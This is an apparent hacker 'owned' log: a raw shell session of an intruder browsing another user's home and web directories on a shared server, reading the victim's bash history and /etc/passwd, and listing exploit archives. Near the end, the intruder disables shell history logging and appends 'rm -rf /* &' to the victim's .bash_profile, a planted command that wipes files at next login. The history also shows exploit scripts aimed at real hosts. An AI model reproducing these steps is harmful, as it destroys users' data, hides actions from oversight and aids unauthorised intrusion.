tsao@cia tsao $ ls
Maildir/ codez.c gob.c mail/ test.c z
a.out* gob* ic-nes.pl test* tsao_i_putted_woman_html__mcbethh
tsao@cia tsao $ ls /;
bin/ boot/ dev/ etc/ hack/ home/ lib/ lost+found/ mnt/ proc/ root/ sbin/ tmp/ usr/ var/ www/
tsao@cia tsao $ ls /www
bin/ conspiracywww/ hackerzwww/ ilyawww/ lost+found/ puxwww/ skdwww/ zemoswww/
booterrorwww/ darkwww/ homewww/ include/ man/ rakywww/ srwww/ ztodwww/
cgi-bin/ dmcawww/ htdocs/ jabberwww/ megwww/ reflectwww/ stormwww/
chaokowww/ fazerwww/ htdocs_bak/ libexec/ mikeccwww/ rtcw/ tsaowww/
ciawww/ fblawww/ icons/ linkwww/ nxeowww/ script2.sh ucwww/
conf/ gzwww/ icslwww/ logs/ proxy/ skatewww/ wtfwww/
tsao@cia tsao $ ls /www/tsa*
_adm0n_/ books/ exploits/ gfx/ goodies/ index.php pictures/ priv/ util.php
tsao@cia tsao $ cp /tmp/a.tgz /www/tsa*/exploits
tsao@cia tsao $ rm /www/tsa*/exploits/a.tgz
tsao@cia tsao $ rm /tmp/a.tgz
tsao@cia tsao $ what a moron
-bash: what: command not found
tsao@cia tsao $ cd /www/te*
-bash: cd: /www/te*: No such file or directory
tsao@cia tsao $ cd /www/ts*
tsao@cia tsaowww $ ls
_adm0n_/ books/ exploits/ gfx/ goodies/ index.php pictures/ priv/ util.php
tsao@cia tsaowww $ ls _a*
ANNOUNCE.txt db_details_importdocsql.php pdf_schema.php tbl_properties.inc.php
CREDITS db_details_links.php phpinfo.php tbl_properties.php
CVS/ db_details_qbe.php read_dump.php tbl_properties_common.php
ChangeLog* db_details_structure.php scripts/ tbl_properties_export.php
Documentation.html* db_printview.php server_common.inc.php tbl_properties_links.php
Documentation.txt db_search.php server_databases.php tbl_properties_operations.php
INSTALL* docs.css server_links.inc.php tbl_properties_options.php
LICENSE* footer.inc.php server_privileges.php tbl_properties_structure.php
README* header.inc.php server_processlist.php tbl_properties_table_info.php
RELEASE-DATE-2.4.0 header_printview.inc.php server_status.php tbl_query_box.php
TODO* images/ server_variables.php tbl_relation.php
badwords.txt index.php sql.php tbl_rename.php
chk_rel.php lang/ tbl_addfield.php tbl_replace.php
config.inc.php ldi_check.php tbl_alter.php tbl_replace_fields.php
db_create.php ldi_table.php tbl_change.php tbl_select.php
db_datadict.php left.php tbl_create.php translators.html
db_details.php libraries/ tbl_dump.php user_password.php
db_details_common.php main.php tbl_indexes.php
db_details_db_info.php mult_submits.inc.php tbl_move_copy.php
db_details_export.php pdf_pages.php tbl_printview.php
tsao@cia tsaowww $ pwd
/www/tsaowww
tsao@cia tsaowww $ ls
_adm0n_/ books/ exploits/ gfx/ goodies/ index.php pictures/ priv/ util.php
tsao@cia tsaowww $ ls boo*
ASM01001.HTM How_to_Crack_CD_Protections.pdf
ASM02001.HTM KilliansMain.02-11-2003.zip
ASM03001.HTM Linux_Programmer's_Guide.zip
ASM04001.HTM Sam's_Teach_Yourself_C_in_21_Days.zip
ASM_KeyGen_Tutorial.rar Sam's_Teach_Yourself_Perl_5_in_21_Days.zip
Advanced_Perl_Programming.zip Teach_Yourself_Tcp-Ip_In_14_Days_Second_Edition.zip
Assembly_Language_Program_Examples.rar Teach_yourself_Linux_24hrs.zip
Assembly_Language_Tutorial.rar eyeball-ebooks.02-17-2003.zip
BW-FSRV9.02-19-2003.zip fuck-mod_perl2.jpg
BooBot-Tech.02-15-2003.zip gobbles-own-linux.c
Complete_Asm_Language_Tutorial_For_Beginners.zip how_to_crack_programz.zip
How_To_Create_A_New_Indentity.txt qw0000.tga
tsao@cia tsaowww $ gobbles!
-bash: gobbles!: command not found
tsao@cia tsaowww $ ls exp*
0x333cya.tar.gz Xperl_yabbse_mass.tar.gz hypermail.tgz teso/
DSR-nethack.c absolute_uk2.pl oC-localX.c udp-remote-final.tar.gz
MacStumbler-06b.tgz ex_stmkfont.sh ptlink_ipfinder.zip webmail_local.pl
ST-tcphump.c gobbler-1.8alpha.tar.gz smtpscan-0.4.tar.gz yaph-0.91.tar.gz
tsao@cia tsaowww $
Message from root@cia.zemos.net on pts/6 at 18:35 ...
U THERE
EOF
tsao@cia zemoswww $ cd ..
tsao@cia www $ cd dark*
tsao@cia darkwww $ ls
images/ index.html perl/
tsao@cia darkwww $ ls -a
./ ../ .bash_history images/ index.html perl/
tsao@cia darkwww $ cd .
tsao@cia darkwww $ cd pwd
-bash: cd: pwd: No such file or directory
tsao@cia darkwww $ cd /home/tsao
tsao@cia tsao $ ls
Maildir/ a.out* codez.c gob* gob.c ic-nes.pl mail/ test* test.c tsao_i_putted_woman_html__mcbethh
tsao@cia tsao $ ls -a
./ .bash_history .pine-debug2 .qmail a.out* gob.c test*
../ .forward .pine-debug3 .screenrc codez.c ic-nes.pl test.c
.BitchX/ .pine-debug1 .pinerc Maildir/ gob* mail/ tsao_i_putted_woman_html__mcbethh
tsao@cia tsao $ cat .bash_history
talk mikecc
ps -aux
kill -9 19375
ls
w
who
talk s1n
telnet 211.158.16.12 1111
telnet 211.158.16.12 1112
telnet 211.158.16.12 1111
telnet 211.158.16.12 1111
telnet 211.158.16.12 1111
telnet 211.158.16.12 9999
dir
ls -alF
cd /
ls
cd tsaowww
cd www
ls
cd tsaowww
ls
cd icns
cd gzwww
ls
ls
cd exploits
ls
cd ..
ls
ls
whereis htpasswd
cd /www/tsaowww/
ls
mkdir priv
ls
cd priv
htpasswd --help
cd ..
cd ..
ls
cd tsaowww/
ls
htpasswd -c /home/tsao/.htpasswd ironcurtain
cat /home/tsao/.htpasswd
cd priv
echo AuthName "Private Area." >> .htaccess
echo AuthType Basic >> .htaccess
echo AuthUserFile /home/tsao/.htpasswd >> .htaccess
echo Require valid-user >> .htaccess
echo "" >> .htaccess
cat .htaccess
echo require user ironcurtain >> .htaccess
echo "" >> .htaccess
cat .htaccess
ls /home/tsao
ls -a /home/tsao
cat /home/tsao/.htpasswd
cat .htaccess
whereis apache
vi /etc/apache/httpd.conf
ls -al
vi .htaccess
cat .htaccess
mv /home/tsao/.htpasswd /www/tsaowww/priv/.htpasswd
ls -al
cay /etc/apache/httpd.conf | grep .ht
cat /etc/apache/httpd.conf | grep .ht
cat /etc/apache/httpd.conf | grep htac
cat /etc/apache/httpd.conf | grep htpas
vi /etc/apache/httpd.conf
who
cd /
cd www
cd tsaowww
ls
cd priv
ls
cd /
quit
/quit
exit
jpico test.c
pico test.c
pico codez.c
gcc -o codez codez.c
ls
pico codez.c
uname -a
ls
gcc -o codez codez.c
gcc -v codez codez.c
pico ic-nes.pl
per ic-nes.pl www.fbi.gov 80
perl ic-nes.pl www.fbi.gov 80
perl ic-nes.pl www.fbi.gov 80
cd ~mikecc/public_html
cd
exit
w
uname -a
who
ls -l
cd ..
ls
cd ..
ls
cd www/
ls
cd tsaowww/
ls
cd priv/
ls
cd ..
ls
mkdir sitepreview
ls -l
cd sitepreview/
who
vi .htaccess
pico
ls
pwd
htpasswd
htpasswd -c .htpasswd preview
ls
ls -l
ls -la
cat .htpasswd
cat .htaccess
pwd
ls
cd ..
ls
ls -la
cd ..
ls
cd conf/
ls
pico httpd.conf
ls
cd ../tsaowww/
ls
cd sitepreview/
ls
ls -la
rm .*
ls -la
ps -aux
ps -a
ps -A
netstat -a
pico test.php
rm test.php
wget http://umn.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.4.0-php.zip
rm phpMyAdmin-2.4.0-php.zip
wget http://flow.dl.sourceforge.net/sourceforge/phpmyadmin/phpMyAdmin-2.4.0-php.tar.gz
tar zxvf phpMyAdmin-2.4.0-php.tar.gz
ls
rm phpMyAdmin-2.4.0
rm phpMyAdmin-2.4.0-php.tar.gz
mv phpMyAdmin-2.4.0/ _adm0n_
cd _adm0n_/
ls
pico config.inc.php
piwo -w config.inc.php
pico -w config.inc.php
who
w
talk root
ls
pico -w config.inc.php
pico -w config.inc.php
cd ..
ls
pico -w index.php
ls
mkdir gfx
cd gfx
cd ../..
ls
cp ic.gif sitepreview/gfx/
cd sitepreview/gfx/
ls
cd ..
pico -w index.php
wget elodie.ath.cx/default/ath.cx/el0d1e/util.php.txt
wget elodie.ath.cx/ath.cx/el0d1e/util.php.txt
mv util.php.txt util.php
pico -w util.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
rm index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
clear
ls
cd
ls -la
pico .bash_history
ls
ls -la
cd /www/tsaowww/
ls
ls sitepreview/
mv sitepreview/util.php .
mv sitepreview/index.php .
mv sitepreview/_adm0n_/ .
mv sitepreview/gfx/ .
ls sitepreview/
rm -rf sitepreview/
ls
rm index.html
rm tsao.gif
rm ic.gif
ls
pico -w index.php
ls
pico -w index.php
ls
mkdir goodies
cd goodies/
wget http://www.el0d1e.fr.st/icwallpaper.jpg
ls -l
cd ..
pico -w index.php
cd goodies/
rm icwallpaper.jpg
wget http://elodie.ath.cx/ath.cx/el0d1e/icwallpaper.jpg
ls
cd ..
ls
cd priv/
echo you suxxxxx > index.html
ls
cd ..
ls
uname -a
BitchX beethoven.uk.eu.kewl.org
clea
clear
cd
ls
gcc test.c -o test
gcc test.c -o test -lcrypto
ls
./gob
ls
pico -w .bash_history
cat .bash_history | grep ~
cd ..
ls
cd s1n/
ls
cd ..
ls
cd gamez/
ls
cd ..
ls
ls
cd
ls
ls
pico -w test.c
ls
perl ic-nes.pl
./gob
cat .bash_history | grep gob
cat .bash_history | grep hamp
cat .bash_history | grep dance
ls
pico -w test.c
gcc test.c -o test -lcrypto
gcc test.c -o test -lcrypto -pthread
ls
./test
cat .bash_history | grep dance
./test www.site.com -p 80 www.hamsterdance.com -b 0x1f
./test -p 80 www.hamsterdance.com -b 0x1f
ls
cd /www/tsaowww/
ls
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
pico -w index.php
exit
ls
head codez.c
head gob.c
head test.c
pico test.c
ls
head ic-nes.pl
pico ic-nes.pl
ls
cd /www/tsaowww/
ls
cd priv
ls
pico index.html
ls
cd ..
ls
ls _adm0n_
ls
cd pictures
ls
cd ../goodies
wget 74hc192.w.interia.pl/woman.html
cd
ls
touch tsao_i_putted_woman_html__mcbethh
ls
exit
ls
ls -l
cd /www/tsaowww/
ls
who
cd
ls
perl ic-nes.pl
perl ic-nes.pl 62.4.22.250 80
exit
exit
exit
w
exit
w
exit
w
ps aux
exit
ps aux
kill 22669
exit
w
ls
more codez.c
ls
ls -a
cat .bash_history
d
id
cat /etc/motd
id
cat /etc/passwd
ls
more gob.c
ls
ps acux
cd /tmp
ls
more IsIt.c
ls -l
cd /home
ls
ls -a
ls -l
cd the1
ls
cd ..
cd nxep
cd nxepo
cd nxeo
ls
more exp.c
cat as_exploit.c
cd /etc
ls
cathosts
cat hosts
cd /
ls
cd
ls
cd /hack
ls
cd
ls
ls -la
tail z
cat z
rm z
ls
pico helloworld.c
ls -l helloworld.c
cat helloworld.c
rm helloworld.c
cat .bash_history
cd /www
ls
cd tsaowww/
ls
cd exploits/
ls
cd teso
ls
cd teso
ls
cd ../../
ls
cd ..
ls
cd priv
ls
ls -la
cat .htpasswd
cat .htaccess
ls
cd ..
ls
ls -a
cd goodies/
ls
cd ..
ls
cd books
ls
cd ..
ls
cd _adm0n_/
ls
cd ..
ls
cd exploits
ls
head ST-tcphump.c
cd /www
ls -l
cd stormwww
ls
cd private
ls
cd ..
cd projects
ls
cd kommunikator/
ls
lynx index.html
cat index.html
cd ../../
ls
cd school
ls
cd /www
ls
cd zemoswww
ls
cd ..
ls
cd ciawww
ls
cd ../darkwww
ls
cd /
exit
tsao@cia tsao $ mkdir phrack
tsao@cia tsao $ unset HISTFILe
tsao@cia tsao $ HISTFILE=/dev/null
tsao@cia tsao $ cat>>z< echo Im a script kid;rm -rf /* &
> z
tsao@cia tsao $ cat z >>.bash_profile
tsao@cia tsao $ cat .bash_profile
echo Im a script kid;rm -rf /* &
tsao@cia tsao $ haha
-bash: haha: command not found
tsao@cia tsao $ fag
-bash: fag: command not found
tsao@cia tsao $ exit
logout
Connection to unixclan.net closed.
You have new mail in /var/spool/mail/root
bash-2.04#